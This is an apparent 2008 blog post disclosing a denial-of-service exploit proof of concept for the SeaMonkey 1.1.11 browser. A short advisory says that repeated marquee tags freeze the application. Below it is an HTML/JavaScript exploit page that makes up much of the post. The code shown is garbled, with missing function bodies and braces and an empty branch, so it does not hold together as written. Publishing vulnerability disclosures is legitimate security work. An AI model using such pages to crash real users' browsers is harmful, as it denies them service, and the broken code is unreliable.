07 September, 2008

SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC


Title: SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC

Summary: Web-browser, advanced e-mail and newsgroup client,
IRC chat client, and HTML editing made simple - all your
Internet needs in one application.

Product web page: http://www.seamonkey-project.org/

Desc: SeaMonkey suffers from a remote denial of service
vulnerability (DoS), using a special html file with the
<marquee> tag multiple times (>24). Successfully exploiting
these issues allows remote attackers to cause the application
to freeze, denying service to legitimate users.

Tested on Microsoft Windows XP SP2 (English)

Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic

liquidworm [t00t] gmail [d0t] com





<title>SeaMonkey 1.1.11 Remote Denial of Service Exploit</title>


<br /><br /><br /><br />
<br /><br /><br /><br />
<br /><br /><br /><br />


<script type="text/javascript">

document.write("<kbd>Wooow Camel..!! WOW!</kbd>");

function t00t()
for(i=0; i < 25; i++)

alert("SeaMonkey 1.1.11 Remote Denial of Service Exploit");

var b0x = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (b0x == true)

else {
alert("Allrighty Then!");
window.location.href = "http://www.disneyland.com";

</script> </center> </body> </head> </html>


Test: http://www.zeroscience.org/codes/seamonkey_dos.html

No comments: